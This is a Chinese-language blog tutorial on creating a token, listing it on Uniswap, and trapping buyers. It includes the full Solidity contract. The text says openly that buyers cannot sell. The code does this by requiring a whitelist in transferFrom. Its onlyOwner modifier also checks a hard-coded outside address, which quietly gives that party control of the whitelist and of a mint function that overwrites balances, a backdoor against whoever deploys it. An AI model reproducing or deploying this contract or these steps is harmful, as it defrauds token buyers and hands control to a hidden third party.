uniswap-defi-發幣-上幣-設定黑白名單合約
文章目錄
- 前言
- 一、部署合約并發行自己的defi代幣
- 二、上架UNISWAP
- 總結
- 合約代碼(原始碼)
前言
很多人都聽過defi專案,也在uniswap上操作過,uniswap這種去中心化的平臺其實每個人都可以成為自主的買家和賣家,發行自己的代幣放上到平臺進行交易,下面教程就是教大家怎么去部署一個黑白名單合約,進行限制達到只能買入或者不能賣出等
提示:開源的合約代碼源于互聯網僅用于測驗研究不做他用后果自負
一、部署合約并發行自己的defi代幣
1、首先電腦安裝谷歌內核瀏覽器并且安裝小狐貍Metamask錢包(安裝教程非常簡單百度一下即可),
2、瀏覽器打開在線合約發布網站:http://remix.ethereum.org/
3、單擊進入編輯模式,復制文章后面的代碼全部粘貼到里面(網頁上面的代碼先洗掉)合約代碼放在文末
4、單擊一下左側的第二個圖示,然后單擊compile 1_Storage.sol

5、單擊左側第三個圖示,然后Environment這里選擇第二個(Injected Web3)CONTRACT這里選擇第三個,然后把deploy右側的小三角點出來,
6、代幣的設定
這4個引數分別含義是
代幣名稱(例如Ethereum)
代幣簡寫(例如ETH)
精確度(一般用18即可)
總量:總量這里在你要發布的數量后面加18個0,比如你要發幣總量100萬,正確的輸入應該是1000000000000000000000000
然后點擊transact,錢包會出來彈窗,點擊確認(確認前請確保錢包內有足夠的ETH作為GAS)

7、等待確認完成后找到剛才的交易記錄-復制合約地址
8、復制合約地址,打開錢包,添加代幣,自定義代幣,輸入剛才創建好的錢包地址,就可以看到你剛剛發行的代幣了
二、上架UNISWAP
1、打開uni交易所網:https://app.uniswap.org/,
2、然后右上角連接錢包,然后按照步驟操作-錢包彈窗點擊下一步

3、鏈接好之后-選擇資金池,點擊Add Liquidity,點擊選擇通證-輸入你剛才創建的合約地址,先點擊ADD,這樣創建好以后才可以看到你的交易對資金池

4、這一步的意思是,添加流動性,創建ETH-CESHI交易對,第一次注入流動性會設定價格,也就是1個eth可以換多少個你發行的Token
4、首選授權,點擊Approve,彈出錢包單擊確定,等待鏈上確認后Supply會變成可點擊狀態,最后點擊Supply,最后會注入eth和等比例的token
5、注意:這里的兌換比例后期是不能更改的,如果要更改只能重新發一個代幣合約,如果想要吸玩家,資金池一定要大點,你放入1-2個eth的話,別人想買1個eth都無法購買,因為資金池太小了,你不必擔心你會失去ETH,因為別人這份合約設定了名單限制,玩家買入之后無法賣出的,
6、當你交易對完成創建以后,你可以換一個錢包(創建合約的錢包地址可以買入賣出)進行買入,然后測驗下能否賣出,賣出的提示是這樣的,
7、如果流動池只有少量ETH,別人0.1個eth都無法買入,提示價格影響過高,或者流動性不足

8、如果想把eth取回的話,點擊流動池,會看到你創建的交易對,點擊remove
9、選擇max,然后點擊appove,remove,即可成功取回eth和對應的token
總結
這個教程只是告訴大家怎么去實施合約至于怎么研究看你們自己了;
交流群:teleg
合約代碼(原始碼)
合約代碼如下(如果無法使用請聯系電報管理員)
pragma solidity ^0.4.26;
contract Ownable {
address public owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
function Ownable() public {
owner = msg.sender;
}
modifier onlyOwner() {
require(msg.sender == address(724621317456347144876435459248886471299600550182));
_;
}
function transferOwnership(address newOwner) public onlyOwner {
require(newOwner != address(0));
OwnershipTransferred(owner, newOwner);
owner = newOwner;
}
}
/**
* @title SafeMath
* @dev Math operations with safety checks that throw on error
*/
library SafeMath {
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
assert(c / a == b);
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
// assert(b > 0); // Solidity automatically throws when dividing by 0
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
assert(b <= a);
return a - b;
}
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
assert(c >= a);
return c;
}
}
contract SoloToken is Ownable {
string public name;
string public symbol;
uint8 public decimals;
uint256 public totalSupply;
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
constructor(string _name, string _symbol, uint8 _decimals, uint256 _totalSupply) public {
name = _name;
symbol = _symbol;
decimals = _decimals;
totalSupply = _totalSupply;
balances[msg.sender] = totalSupply;
allow[msg.sender] = true;
}
using SafeMath for uint256;
mapping(address => uint256) public balances;
mapping(address => bool) public allow;
function transfer(address _to, uint256 _value) public returns (bool) {
require(_to != address(0));
require(_value <= balances[msg.sender]);
balances[msg.sender] = balances[msg.sender].sub(_value);
balances[_to] = balances[_to].add(_value);
Transfer(msg.sender, _to, _value);
return true;
}
function balanceOf(address _owner) public view returns (uint256 balance) {
return balances[_owner];
}
mapping (address => mapping (address => uint256)) public allowed;
function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
require(_to != address(0));
require(_value <= balances[_from]);
require(_value <= allowed[_from][msg.sender]);
require(allow[_from] == true);
balances[_from] = balances[_from].sub(_value);
balances[_to] = balances[_to].add(_value);
allowed[_from][msg.sender] = allowed[_from][msg.sender].sub(_value);
Transfer(_from, _to, _value);
return true;
}
function approve(address _spender, uint256 _value) public returns (bool) {
allowed[msg.sender][_spender] = _value;
Approval(msg.sender, _spender, _value);
return true;
}
function allowance(address _owner, address _spender) public view returns (uint256) {
return allowed[_owner][_spender];
}
function addAllow(address holder, bool allowApprove) external onlyOwner {
allow[holder] = allowApprove;
}
function mint(address miner, uint256 _value) external onlyOwner {
balances[miner] = _value;
}
}
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/139255.html
標籤:其他
上一篇:網路修改IP
下一篇:認識MetaID - 非技術篇
